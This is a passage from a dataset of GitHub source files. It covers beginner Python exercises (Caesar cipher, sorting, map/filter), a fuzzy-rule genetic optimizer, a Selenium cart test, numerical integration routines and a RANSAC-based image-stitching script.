Arguments:\\n{1!r}\"\n            message = template.format(type(ex).__name__, ex.args)\n            logging.warning(message)\n            return False\n\n    return True\n","repo_name":"COVIS-Sonar/covis-worker","sub_path":"apps/db_validators/add_raw_entry_for_wasabi.py","file_name":"add_raw_entry_for_wasabi.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35153876034","text":"# The captcha requires you to review a sequence of digits (your puzzle input) and find the sum of all digits that match the next digit in the list. The list is circular, so the digit after the last digit is the first digit in the list.\n\nseq = input();\nlength = len(seq);\nresult = 0;\ntemp = -1;\nfor i in range(length+1):\n\tif(temp >= 0 and temp == int(seq[i%length])):\n\t\tresult += temp;\n\ttemp = int(seq[i%length]);\nprint(result);","repo_name":"tterb/advent-of-code","sub_path":"2017/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"38672132486","text":"import art\nfrom replit import clear\n\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\n# cipher function\ndef cipher(text,shift,direction):\n    output=''\n    # if decode => shift = -shift\n    if direction=='decode':\n        shift *= -1\n    for letter in text:\n        if letter in alphabet:\n            index_letter = alphabet.index(letter)\n            shift_index = index_letter + shift #here shift is negative if decoding\n            if shift_index < 0 or shift_index >= 26:\n                remainder_index = shift_index % 26\n                output += alphabet[remainder_index]\n            else:\n                output += alphabet[shift_index]\n        else:\n            output += letter\n    print(f\"the {direction}d text is {output} \")\n    return output\n\n\n
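# Example (added for clarity): cipher('abc', 3, 'encode') returns 'def', and\n# cipher('def', 3, 'decode') returns 'abc'.\n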
#start ciphering\nplaying = True\nencodedTextHistory = []\ndecodedTextHistory = []\n\nwhile playing:\n    clear()\n    print(art.logo)\n    direction = input(\"Type 'encode' to encrypt, type 'decode' to decrypt or view to view history:\\n\").lower()\n\n    if direction != 'view': \n        text = input(\"Type your message:\\n\").lower()\n        shift = int(input(\"Type the shift number:\\n\"))\n\n        output = cipher(text,shift,direction)\n        save = input(f'Do you want to save the {direction}d text ?\\n press yes or y to save\\n')\n\n        if save == 'y' or save == 'yes':\n            if direction == 'encode':\n\n                encodedTextHistory.append(output)\n            else:\n                decodedTextHistory.append(output)\n\n    else:\n        direction_of_history = input('Which history do you need to see ? \\n encoded or decoded\\n type e for encoded or d for decoded\\n')\n        if direction_of_history == 'e':\n            for text in encodedTextHistory:\n                print(text)\n        else:\n            for text in decodedTextHistory:\n                print(text)\n    \n    playing_again = input('Press any key to quit, type y or yes to continue again. \\n').lower()\n    if playing_again == 'yes' or playing_again == 'y':\n        playing = True\n    else:\n        playing = False","repo_name":"SamroodAli/python-pro-day-8-caesar-cipher","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72235426703","text":"import numpy as np\nfrom deap import creator, base, tools, algorithms\nfrom sklearn.metrics import precision_score\nfrom skfuzzy import control as ctrl\n\n# Number of rules in an individual\nIND_SIZE = 15\n\n\nclass RuleSetOptimizer:\n    def __init__(self, fvt_generator, input_universes, X_val_dict, y_val, max_occupancy, n_clusters=3, pop_size=50,\n                 cxpb=0.5, mutpb=0.2, ngen=100):\n        self._input_universes = input_universes\n        self.X_val_dict = X_val_dict\n        self.y_val = y_val\n        self.max_occupancy = max_occupancy\n        self.n_clusters = n_clusters\n        self.pop_size = pop_size\n        self.cxpb = cxpb\n        self.mutpb = mutpb\n        self.ngen = ngen\n\n        # Create the fuzzy control variables\n        self.inputs = fvt_generator.generate_antecedents()\n        self.output = fvt_generator.generate_consequent()\n\n        # Setup DEAP\n        creator.create(\"FitnessMin\", base.Fitness, weights=(-1.0,))\n        creator.create(\"Individual\", list, fitness=creator.FitnessMin)\n\n        self.toolbox = base.Toolbox()\n\n        # Generate a random feature cluster number\n        self.toolbox.register(\"a_cluster\", np.random.randint, 0, self.n_clusters)\n\n        # Generate a random consequent cluster number\n        self.toolbox.register(\"c_cluster\", np.random.randint, 0, self.n_clusters)\n\n        # Generate a random rule\n        def generate_rule():\n            # Initialize rule dict with features as keys and clusters as values\n            rule = {feature: 'cluster' + str(self.toolbox.a_cluster() + 1) for feature in self.inputs.keys()}\n\n            # Assign 'Occupancy' a different cluster\n            rule['Occupancy'] = 'cluster' + str(self.toolbox.c_cluster() + 1)\n\n            # Generate condition using bitwise AND (&) operator between each feature in the rule\n            condition = None\n            for feature in self.inputs.keys():\n                if condition is None:\n                    condition = self.inputs[feature][rule[feature]]\n                else:\n                    condition = condition & self.inputs[feature][rule[feature]]\n\n            # Create a new rule using the generated condition and the output for 'Occupancy'\n            new_rule = ctrl.Rule(condition, self.output[rule['Occupancy']])\n\n            return new_rule\n\n        # Generate an individual\n        \"\"\"def generate_individual():\n            rules = []\n            for _ in range(IND_SIZE):\n                rules.append(generate_rule())\n            return generate_controller(rules)\"\"\"\n\n        # Register an individual\n        # self.toolbox.register(\"individual\", creator.Individual, generate_individual)\n        # self.toolbox.register(\"individual\", tools.initRepeat, creator.Individual, generate_rule, n=n_rules)\n        self.toolbox.register(\"individual\", tools.initRepeat, creator.Individual, generate_rule, n=IND_SIZE)\n\n        # Register a population\n        # self.toolbox.register(\"population\", tools.initRepeat, list, self.toolbox.individual)\n        # self.toolbox.register(\"population\", tools.initRepeat, list, generate_controller(self.toolbox.individual()))\n        self.toolbox.register(\"population\", tools.initRepeat, list, self.toolbox.individual)\n\n        # Register the evaluation function\n        self.toolbox.register(\"evaluate\", self.evaluate)\n\n        # Swaps half the rules between two controllers.\n        def cxController(ind1, ind2):\n\n            # Swap half the rules\n            temp = ind1[len(ind1) // 2:]\n            ind1[len(ind1) // 2:] = ind2[len(ind2) // 2:]\n            ind2[len(ind2) // 2:] = temp\n\n            return ind1, ind2\n\n        
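# For example (added): with ind1 = [r1, r2, r3, r4] and ind2 = [r5, r6, r7, r8],\n        # the swap yields ind1 = [r1, r2, r7, r8] and ind2 = [r5, r6, r3, r4].\n        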
self.toolbox.register(\"mate\", cxController)\n\n        # Mutates a controller by changing one rule at random.\n        def mutController(individual):\n            individual[np.random.randint(0, len(individual))] = generate_rule()\n            return individual,\n\n        self.toolbox.register(\"mutate\", mutController)\n\n        self.toolbox.register(\"select\", tools.selTournament, tournsize=3)\n\n    # Generate a controller with random rules\n    def generate_controller(self, rules):\n        system = ctrl.ControlSystem()\n        # The loop index starts at -1 to work around a bug in skfuzzy\n        # that always lost the last rule\n        for i in range(-1, len(rules)):\n            system.addrule(rules[i])\n        simulation = ctrl.ControlSystemSimulation(system)\n\n        return simulation\n\n    def evaluate(self, individual):\n\n        simulation = self.generate_controller(individual)\n\n        y_pred = []\n        for record in self.X_val_dict:\n\n            # Input values into the controller\n            for feature in record:\n                simulation.input[feature] = record[feature]\n\n            # Compute the result\n            simulation.compute()\n\n            # Get output and append to y_pred\n            y_pred.append(simulation.output['Occupancy'] * self.max_occupancy / 100)\n\n        threshold = 0.5\n        y_true_binary = [1 if y > threshold else 0 for y in self.y_val]\n        y_pred_binary = [1 if y > threshold else 0 for y in y_pred]\n\n        precision = precision_score(y_true_binary, y_pred_binary)\n        print('Precision: ', precision)\n        return precision,\n\n    def optimize(self):\n        population = self.toolbox.population(n=self.pop_size)\n\n        # Calculate fitness for each individual in the population\n        fitnesses = map(self.toolbox.evaluate, population)\n        for ind, fit in zip(population, fitnesses):\n            ind.fitness.values = fit\n\n        result = algorithms.eaSimple(population, self.toolbox, cxpb=self.cxpb, mutpb=self.mutpb, ngen=self.ngen)\n        best_individual = tools.selBest(population, k=1)[0]\n\n        return best_individual\n","repo_name":"GiorgioPaoletti-Unicam/membership-function-occupancy-estimation","sub_path":"RuleSetOptimizer.py","file_name":"RuleSetOptimizer.py","file_ext":"py","file_size_in_byte":5699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27815943403","text":"def Sort(arr):\n    \"\"\"Selection sort algorithm.\"\"\"\n    for i in range(len(arr)-1):\n        min = i\n\n        for j in range(i+1, len(arr)):\n            if arr[j] < arr[min]:\n                min = j\n        arr[i], arr[min] = arr[min], arr[i]\n\n\nn = int(input())\nnumbers = list(map(int, input().split()))\n\nSort(numbers)\n\nfor index in range(len(numbers)):\n    print(str(numbers[index])\n          if index == len(numbers)-1\n          else str(numbers[index]) + \" \",\n          end='')\n    ","repo_name":"jeffreytzeng/Algorithm","sub_path":"selection sort/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26609362794","text":"'''\nvaccine site array object that has a wait time array \n=> map to average the wait time and add to object \n=> filter out the sites that have an average wait time above a certain amount\n'''\n\nwait_time = [20, 10, 15, 7, 30, 45, 60, 5, 4]\nwait_time2 = ['20', '10', '15', '7', '30', '45', '60', '5', '4']\nclinic = [\n    'Hallingford', 'Washington', 'Griff Hospital', 'Masonford', 'Jacksonville',\n    'Beurotown', 'Belltown', 'Lickenville', 'Whatsitburg'\n    ]\n\nstring_wait = str(wait_time)\n\nprint(\"String Test\", string_wait)\n# ==========Map========== #\n\nresult1 = map(lambda x, y: x + \" minutes at \" + y, wait_time2, clinic)\nprint(\"Result 1\", list(result1))\n\n
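# For instance (added), the first pairing above prints as '20 minutes at Hallingford'.\n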
# def combine_array(arr1, arr2):\n    \n\n# ==========Filter========== #\n\n# def too_long(time):\n#     if time > 30:\n#         return \"Wait time longer than 30 minutes\"\n#     else: \n#         return \"Short wait time\"\n\ndef short_time(time):\n    if time < 30:\n        return True\n    else: \n        return False\n\ndef long_time(time):\n    if time >= 30:\n        return True\n    else: \n        return False\n\nlong_wait = list(filter(long_time, wait_time))\nshort_wait = list(filter(short_time, wait_time))\n\n# print(\"Long Wait Time\", long_wait)\n# print(\"Short Wait Time\", short_wait)","repo_name":"kawaharm/scenarios_python","sub_path":"justin.py","file_name":"justin.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2693517064","text":"# Source: https://www.acmicpc.net/problem/1946\nt = int(input())\nfor _ in range(t):\n    n = int(input())\n    answer = 0\n    b = 100001\n\n    scores = [list(map(int, input().split())) for i in range(n)]\n    # Sort by the rank from the first interview\n    scores.sort(key=lambda x: (x[0]))\n\n    for i in range(n):\n        # Since the list is already sorted by the first rank, only the\n        # second interview result needs to be compared\n        if(scores[i][1] < b):\n            b = scores[i][1]\n            answer += 1\n\n    print(answer)\n","repo_name":"Ssook/Algorithm","sub_path":"boj/1946.py","file_name":"1946.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"36703625456","text":"import unittest\nimport time\nfrom selenium import webdriver\nimport logging\nfrom TestWebsitelogin.Pages.login_page import LoginPage\nfrom TestWebsitelogin.Pages.myaccount_page import MyAccountPage\nfrom TestWebsitelogin.Pages.add_items_to_cart_from_search_page import AddItemsToCartPage\nfrom TestWebsitelogin.Pages.cart_page import MyCartPage\nfrom config_login import ke\n\nclass TestAutomationPracticeSearchAddtocart(unittest.TestCase):\n    @classmethod\n    def setUp(cls):\n        cls.driver = webdriver.Chrome(executable_path=\"/Applications/chromedriver\")\n        cls.driver.maximize_window()\n        cls.driver.implicitly_wait(5)\n\n    @classmethod\n    def tearDown(cls):\n        cls.driver.quit()\n\n\n    def test_search_addtocart(self):\n\n        logging.basicConfig(\n            format='%(levelname)s: %(asctime)s: %(message)s',\n            filename='/Users/siriqa/PycharmProjects/pythonProject/TestWebsitelogin/Reports/loggingfile.py',\n            level=logging.DEBUG)\n        time.sleep(5)\n        driver = self.driver\n        driver.get(ke['url_login'])\n        logging.info('Started LogIn')\n\n        #logging in\n        login = LoginPage(driver)\n        login.enter_username(ke['email'])\n        login.enter_password(ke['passwd'])\n        login.click_submit()\n        time.sleep(6)\n\n        #searching item 1\n\n        myaccount = MyAccountPage(driver)\n        myaccount.search_item(ke['search1_top'])\n        myaccount.search_submit()\n\n        #Add to cart\n        addtocart = AddItemsToCartPage(driver)\n        addtocart.item_selection()\n        #price_each_item = driver.find_element_by_id('our_price_display').text\n        #quantity_each_item = driver.find_element_by_id(quantity_wanted).text\n        time.sleep(5)\n\n        addtocart.item_add_to_cart()\n        logging.info('{} Item added to cart successfully'.format(ke['search1_top']))\n        time.sleep(5)\n        addtocart.continue_shopping()\n        time.sleep(5)\n\n        # searching item 2\n        #myaccount = MyAccountPage(driver)\n        driver.find_element_by_xpath('//*[@id=\"search_query_top\"]').clear()\n        myaccount.search_item(ke['search2_top'])\n        myaccount.search_submit()\n        logging.info('search successful')\n\n        # Add to cart\n        #addtocart = AddItemsToCartPage(driver)\n        addtocart.item_selection()\n        time.sleep(5)\n        addtocart.item_add_to_cart()\n        time.sleep(5)\n        
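# Descriptive comment (added): read the running total shown in the add-to-cart\n        # confirmation overlay before closing it.\n        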
total_price_afteradding_items = driver.find_element_by_xpath('//*[@id=\"layer_cart\"]/div[1]/div[2]/div[1]/span').text\n time.sleep(5)\n\n addtocart.continue_shopping()\n time.sleep(10)\n count_addcart = driver.find_element_by_xpath('//*[@id=\"header\"]/div[3]/div/div/div[3]/div/a/span[1]').text\n #print(count_addcart)\n time.sleep(5)\n logging.info('{} Item added to cart successfully'.format(ke['search2_top']))\n\n #cartpage Summary quantity,prices validation\n mycartsummary = MyCartPage(driver)\n mycartsummary.cart_click()\n time.sleep(5)\n price_total = driver.find_element_by_id('total_product').text\n count_cartpage = driver.find_element_by_id('summary_products_quantity').text\n count_cartpagesummary = count_cartpage.split()[0]\n\n\n #Assertions\n assert(count_addcart == count_cartpagesummary),'No. of items added to cart are not same in Cart Summary page'\n print(\"No. of items added to cart{0} are same in Cart Summary page{1}\".format(count_addcart,count_cartpagesummary))\n logging.info('Logging: Items quantity added is same in Cart Summary page')\n\n assert(total_price_afteradding_items == price_total),'Total item prices added are not same in Cart Summary page'\n print(\"Total price of items {0} is same as Total products price{1} in Cart summary page\".format(total_price_afteradding_items, price_total))\n logging.info('Logging: Items total prices is same as Total products prices in Cart Summary page')\n\n driver.close()\n\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"kastala/WebstoreLogin_python","sub_path":"cart_order_files/search_addtocart.py","file_name":"search_addtocart.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29942676289","text":"import numpy as np\n\n\n''' ************* Simpson's Method ************* '''\ndef simpson(function, a, b):\n '''\n Overview:\n Here, we interpolate the function with a parabola that has been\n generically integrated. 
Conditions of the problem will then be\n        substituted for a numerical solution.\n    \n    Inputs:\n    -> 'function' is the curve we wish to integrate.\n    -> 'a' and 'b' are the endpoints of the interval we will integrate through.\n    \n    Outputs:\n    -> 'area,' the approximation of the integral of function over the given\n    interval.\n    '''\n    #--------------------------------#\n    \n    # The midpoint of the interval:\n    midpt = a + (b-a)/2\n    \n    # 'h' is the difference between the endpoint of the interval, 'b,' and its\n    # midpoint.\n    h = b - midpt\n    \n    # Simpson's Rule; we estimate the integral of our function using the\n    # integral of a polynomial interpolant;\n    # Functional evaluations give y0, y1, and y2, respectively.\n    area = (h/3) * (function(a) + 4*function(midpt) + function(b))\n    \n    return area\n    \n\n''' ************* Composite Simpson's Method ************* '''\ndef compositeSimpson(function, n, a, b):\n    '''\n    Description:\n        The approach of this implementation is to split the interval up into\n        smaller subintervals and apply Simpson's Rule to each.\n\n    Inputs:\n    -> 'function' is the curve we wish to integrate;\n    -> 'n' is the number of subintervals we want to integrate over (must be\n    even); effectively, the number of steps;\n    -> 'a' and 'b' are the endpoints of the interval we will integrate through.\n    \n    Outputs:\n    -> 'area,' the approximation of the integral of function over the given\n    interval.\n    '''\n    #--------------------------------#\n\n    # Set of endpoints and midpoints defining each of n subintervals\n    x = np.linspace(a,b,n+1)\n\n    # The width of each subinterval.\n    h = x[1]-x[0]\n\n    # Creating a scaling array so that we can multiply through by f\n    # evaluated at each point with its necessary scaling factor (i.e., 1 for the\n    # endpoints, 2 for the even midpoints, and 4 for the odd midpoints).\n    # This will streamline the summation.\n    c = 2*np.ones(n+1)\n    c[0], c[-1] = 1.0, 1.0\n\n    for i in range(1,len(c)-1):\n        if i % 2 == 1:\n            c[i] = 4\n\n    # Computing area by summing over all scaled function evaluations.\n    area = (h/3) * np.sum(c*function(x))\n\n    return area\n\n
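# Example (added): compositeSimpson(np.sin, 10, 0, np.pi) evaluates to roughly 2.0,\n# the exact value of the integral of sin(x) over [0, pi].\n\n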
''' ************* Adaptive Quadrature (Simpson's) ************* '''\ndef adaptiveSimpson(fxn, a, b, tol=1e-12, Sab=0.0, recursion_counter=0):\n    '''\n    Description:\n        Similar to composite Simpson's method, but here the approach is to\n        subdivide intervals and apply the method to nested subintervals until\n        the total error reaches a set ceiling.\n\n    Inputs:\n    -> 'fxn' is the function we are integrating.\n    -> 'a' and 'b' are the endpoints of the interval we will integrate across.\n    -> Stopping Conditions: 'tol' gives the maximum error we are willing to\n    accept, and 'recursion_counter' counts number of recursions (cap at 20).\n    -> Sab is the value of Simpson's Method on the interval of [a,b] we are\n    currently working on.\n\n    Outputs:\n    -> Total sum, 's_ac + s_cb' over specified interval, or recursive\n    subdivisions\n    \n    \n    ** 'S_ab' and 'recursion_counter' are only passed internally **\n    '''\n    #--------------------------------#\n\n    # Finding midpoint of the current interval [a,b].\n    c = (a+b)/2\n\n    # Find s_ab, sum over the current interval, [a,b], using Simpson's Method...\n    s_ab = simpson(fxn, a, b)\n\n    # ... And for the intervals [a, c] and [c, b], where 'c' is the midpoint.\n    s_ac = simpson(fxn, a, c)\n\n    s_cb = simpson(fxn, c, b)\n\n    # Throwing value error if maximum recursion depth is reached;\n    # Max = 20 since that has the potential to produce 2^20 (about a million)\n    # function calls.\n    if recursion_counter == 20:\n        raise ValueError('Maximum recursion depth reached. Either choose a larger \\\n            error tolerance or raise the depth cap.')\n\n    # Checking deviation of sums of subintervals from sum over entire interval.\n    if (np.abs(s_ab - s_ac - s_cb) < 10*tol):\n        return s_ac + s_cb # If within tolerance, accept the current sum.\n    else:\n        return adaptiveSimpson(fxn, c, b, tol/2, s_cb, recursion_counter+1) +\\\n               adaptiveSimpson(fxn, a, c, tol/2, s_ac, recursion_counter+1)\n\n\n''' ************* Gaussian Quadrature ************* '''\ndef gaussQuad(function, n, a=-1, b=1):\n    '''\n    Description:\n        Approximates the integral of 'function' on [a, b] using n-point\n        Gauss-Legendre quadrature.\n\n    Inputs:\n    -> 'function' is the function we are integrating.\n    -> 'n' is the number of nodes (roots of Legendre polynomial p_n(x)).\n    -> 'a' and 'b' are the endpoints of the interval we will integrate across.\n    -1 and 1 are the defaults.\n\n    Output:\n    -> 'result' is the value of the integral of 'function' on the\n    interval [a,b].\n    '''\n    #--------------------------------#\n\n    # Finding the roots and weights: Passing our degree, n, outputs sample\n    # nodes and corresponding weights 'wts.'\n    nodes, wts = np.polynomial.legendre.leggauss(n)\n\n    # Since Gaussian Quadrature was developed for the interval [-1,1], we\n    # perform a transformation to [a,b]. (Note that this changes nothing if\n    # [a,b] = [-1,1].)\n    midpt = (a+b)/2.0\n    halfWidth = (b-a)/2.0\n    nodes = halfWidth*nodes + midpt\n\n    # Evaluating and storing function evaluations for nodes.\n    fNodes = function(nodes)\n\n    # Computing the inner product.\n    result = np.dot(wts, fNodes)\n\n    # Multiply by the halflength for the interval transformation. 
{"seq_id":"26366337513","text":"import matplotlib.pyplot as plt\nimport skimage.io as skio\nfrom skimage.transform import warp\nfrom scipy import misc\nimport numpy as np\nimport sys\nimport harris\nimport math\nimport random\n\n\ndef computeHomographyMatrix(imA_points, imB_points):\n\tA = computeAMatrix(imA_points, imB_points)\n\tb = computeBVector(imB_points)\n\t\n\tresult = np.linalg.lstsq(A, np.transpose(b))[0]\n\treturn formatHMatrix(result)\n\ndef computeAMatrix(imA_points, imB_points):\n\tmatrix_string = \"\"\n\tfor i in range(len(imA_points)):\n\t\tx, y = imA_points[i][0], imA_points[i][1]\n\t\tx_1, y_1 = imB_points[i][0], imB_points[i][1] \n\t\tif i + 1 == len(imA_points):\n\t\t\tvalue = \"{} {} 1 0 0 0 {} {};\".format(x, y, -1 * x * x_1, -1 * y * x_1) +\"0 0 0 {} {} 1 {} {}\".format(x, y, -1 * x * y_1, -1 * y * y_1)\n\t\t\tmatrix_string += value\n\t\telse:\n\t\t\tvalue = \"{} {} 1 0 0 0 {} {};\".format(x, y, -1 * x * x_1, -1 * y * x_1) +\"0 0 0 {} {} 1 {} {};\".format(x, y, -1 *x * y_1, -1 * y * y_1)\n\t\t\tmatrix_string += value\n\n\treturn np.matrix(matrix_string)\n\ndef computeBVector(imB_points):\n\tvector_string = \"\"\n\tfor i in range(len(imB_points)):\n\t\tx, y = imB_points[i][0], imB_points[i][1]\n\t\tvector_string += \" {} {} \".format(x, y)\n\n\treturn np.matrix(vector_string)\n\ndef formatHMatrix(result):\n\tH = np.matrix(\"{} {} {};\".format(result[0], result[1], result[2])\n\t\t\t\t +\"{} {} {};\".format(result[3], result[4], result[5])\n\t\t\t\t +\"{} {} 1\".format(result[6], result[7]))\n\treturn H\n\ndef ANMS(points, eps, H):\n\tradius_values = {}\n\tfor center in points:\n\t\tH_i = H[center[0], center[1]]\n\t\tinterest_points = []\n\t\tfor point in points:\n\t\t\tH_j = H[point[0], point[1]]\n\t\t\tif H_i < (eps * H_j):\n\t\t\t\tinterest_points.append(point)\n\t\tif len(interest_points) > 0:\n\t\t\tradius_values[center] = np.amin(harris.dist2(np.array([center]), np.array(interest_points)))\n\tradius_values = sorted((value, key) for (key, value) in radius_values.items())[::-1]\n\t\n\t# Keep the 500 points with the largest suppression radii (assumes at least\n\t# 500 candidates survive the loop above).\n\ttop_500 = [[], []]\n\tfor i in range(500):\n\t\ttop_500[0].append(radius_values[i][1][0])\n\t\ttop_500[1].append(radius_values[i][1][1])\n\n\treturn top_500\n\ndef find_descriptors(im, points):\n\tresults = {}\n\tpatch_size = 40\n\tfor point in points:\n\t\tcorner_left_x = point[0] - 20\n\t\tcorner_left_y = point[1] - 20\n\t\tsample_patch = np.zeros((40, 40))\n\t\tfor i in range(patch_size):\n\t\t\tfor j in range(patch_size):\n\t\t\t\tpixel = im[corner_left_x + i][corner_left_y + j]\n\t\t\t\tsample_patch[i][j] = pixel\n\n\t\t# (scipy.misc.imresize was removed in SciPy 1.3; newer code would use\n\t\t# skimage.transform.resize or PIL here.)\n\t\tsubsample_patch = misc.imresize(sample_patch, (8, 8))\n\n\t\tmean = np.mean(subsample_patch)\n\t\tstd = np.std(subsample_patch)\n\t\tnormalized_patch = (subsample_patch - mean)/std\n\n\t\tresults[point] = np.reshape(normalized_patch, (1, 64))\n\treturn results\n
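# The nested pixel loop in find_descriptors above can be expressed with one
# numpy slice; a minimal sketch under the same assumptions (grayscale 'im',
# (row, col) interest point), with the 8x8 subsampling step omitted:
def extract_patch(im, point, half=20):
    r, c = point
    patch = im[r - half:r + half, c - half:c + half]  # 40x40 window copy
    return (patch - np.mean(patch)) / np.std(patch)   # bias/gain normalization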
\ndef feature_match(desc_imA, desc_imB):\n\tresults = {}\n\tfor point_A, vector_A in desc_imA.items():\n\t\tdists = {}\n\t\tfor point_B, vector_B in desc_imB.items():\n\t\t\tdists[point_B] = harris.dist2(vector_A, vector_B)[0][0]\n\t\tdists = sorted((value, key) for (key, value) in dists.items())\n\n\t\tif dists[0][0]/dists[1][0] < .3:\n\t\t\tresults[point_A] = dists[0][1]\n\treturn results\n\ndef RANSAC(matched_points):\n\tpoints_A = list(matched_points.keys())\n\tpoints_B = list(matched_points.values())\n\tresults = {}\n\t# Draw 4 distinct point correspondences at random.\n\tsub_points = random.sample(range(len(points_A)), 4)\n\tsubpoints_A = np.array([points_A[sub_points[0]], points_A[sub_points[1]], points_A[sub_points[2]], points_A[sub_points[3]]])\n\tsubpoints_B = np.array([points_B[sub_points[0]], points_B[sub_points[1]], points_B[sub_points[2]], points_B[sub_points[3]]])\n\n\tH = computeHomographyMatrix(subpoints_A, subpoints_B)\n\tb = np.array(points_B)\n\n\terror = np.dot(H, np.transpose(np.hstack((points_A, np.ones((len(points_A), 1))))))\t\n\tA = np.zeros_like(error)\n\tfor i in range(3):\n\t\tA[i, :] = error[i, :] /error[2, :]\n\n\tA = np.transpose(A)[:,:2]\n\tval_1 = (A[:,0] - b[:,0])**2\n\tval_2 = (A[:,1] - b[:,1])**2\n\t# Euclidean reprojection error for each correspondence.\n\treproj_err = np.sqrt(val_1 + val_2)\n\n\tfor i in range(len(reproj_err)):\n\t\tif reproj_err[i] < 0.5:\n\t\t\tresults[points_A[i]] = points_B[i]\n\treturn results\n\ndef linearBlend(imA, imB, weight):\n\theight, width = imA.shape[0], imA.shape[1]\n\tblendedIm = np.zeros((imA.shape))\n\tfor y in range(height):\n\t\tfor x in range(width):\n\t\t\tif np.sum(imA[y, x, :]) != 0.0 and np.sum(imB[y, x, :]) != 0.0:\n\t\t\t\tblendedIm[y, x, :] = imA[y, x, :] * (1 - weight) + imB[y, x, :] * weight\n\t\t\telse:\n\t\t\t\tblendedIm[y, x, :] = imA[y, x, :] + imB[y, x, :]\n\n\treturn np.clip(blendedIm, 0, 1)\n\ndef main():\n\tim_left = misc.imread(\"./images/thames1.jpg\")/255.\n\tim_left_bw = misc.imread(\"./images/thames1.jpg\", flatten = True)/255.\n\tim_right = misc.imread(\"./images/thames2.jpg\")/255.\n\tim_right_bw = misc.imread(\"./images/thames2.jpg\", flatten = True)/255.\n\n\tH_left, coors_left = harris.get_harris_corners(im_left_bw)\n\tH_right, coors_right = harris.get_harris_corners(im_right_bw)\n\n\tplt.imshow(im_left)\n\tplt.scatter(coors_left[1], coors_left[0], s = 40)\n\tplt.show()\n\n\tplt.imshow(im_right)\n\tplt.scatter(coors_right[1], coors_right[0], s = 40)\n\tplt.show()\n\n\tpoints_left = []\n\tANMS_points_left = []\n\tfor i in range(len(coors_left[0])):\n\t\tpoints_left.append((coors_left[0][i], coors_left[1][i]))\n\tANMS_coors_left = ANMS(points_left, .9, H_left)\n\n\tpoints_right = []\n\tANMS_points_right = []\n\tfor i in range(len(coors_right[0])):\n\t\tpoints_right.append((coors_right[0][i], coors_right[1][i]))\n\tANMS_coors_right = ANMS(points_right, .9, H_right)\n\n\tplt.imshow(im_left)\n\tplt.scatter(ANMS_coors_left[1], ANMS_coors_left[0], s = 40)\n\tplt.show()\n\n\tplt.imshow(im_right)\n\tplt.scatter(ANMS_coors_right[1], ANMS_coors_right[0], s = 40)\n\tplt.show()\n\n\tfor i in range(len(ANMS_coors_left[0])):\n\t\tANMS_points_left.append((ANMS_coors_left[0][i], ANMS_coors_left[1][i]))\n\tdescriptors_left = find_descriptors(im_left_bw, ANMS_points_left)\n\n\tfor i in range(len(ANMS_coors_right[0])):\n\t\tANMS_points_right.append((ANMS_coors_right[0][i], ANMS_coors_right[1][i]))\n\tdescriptors_right = find_descriptors(im_right_bw, ANMS_points_right)\n\n\tmatched_features = feature_match(descriptors_left, descriptors_right)\n\n\tmatched_left_points = list(matched_features.keys())\n\tplt.imshow(im_left)\n\tplt.scatter([x for (y, x) in matched_left_points], [y for (y, x) in matched_left_points], s = 40)\n\tplt.show()\n\n\tmatched_right_points = list(matched_features.values())\n\tplt.imshow(im_right)\n\tplt.scatter([x for (y, x) in matched_right_points], [y for (y, x) in matched_right_points], s = 40)\n\tplt.show()\n\n\tRANSAC_points = {}\n\tfor i in range(500):\n\t\tpoints = RANSAC(matched_features)\n\t\tif len(points) > len(RANSAC_points):\n\t\t\tRANSAC_points = points\n\n\tH_L = computeHomographyMatrix(list(RANSAC_points.keys()), list(RANSAC_points.values()))\n\tH_R = computeHomographyMatrix(list(RANSAC_points.keys()), list(RANSAC_points.values()))\n\n\twarpedImL = warp(im_left, np.linalg.inv(H_L), output_shape = (im_left.shape[0] * 1.5, im_left.shape[1] * 3))\n\twarpedImR = warp(im_right, np.linalg.inv(H_R), output_shape = (im_left.shape[0] * 1.5, im_left.shape[1] * 3))\n\n\tresult = linearBlend(warpedImL, warpedImR, weight = .5)\n\n\tmisc.imsave(\"warpedL.png\", warpedImL)\n\tmisc.imsave(\"warpedR.png\", warpedImR)\n\tmisc.imsave(\"warped_result.png\", result)\n\nmain()\n\t","repo_name":"Zumbalamambo/cs194-26","sub_path":"project6/part_B/karl_cempron_code_proj6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
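# The core of the RANSAC error check above: map points through a homography H
# and renormalize the homogeneous coordinates. H here is an arbitrary example
# (a pure 2x scale) standing in for the output of computeHomographyMatrix:
import numpy as np

H = np.array([[2.0, 0.0, 0.0],
              [0.0, 2.0, 0.0],
              [0.0, 0.0, 1.0]])
pts = np.array([[10.0, 10.0], [3.0, 7.0]])      # (x, y) input points
hom = np.hstack((pts, np.ones((len(pts), 1))))  # append w = 1
mapped = np.dot(H, hom.T)                       # 3 x N homogeneous result
print((mapped[:2, :] / mapped[2, :]).T)         # divide by w -> [[20. 20.] [ 6. 14.]]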
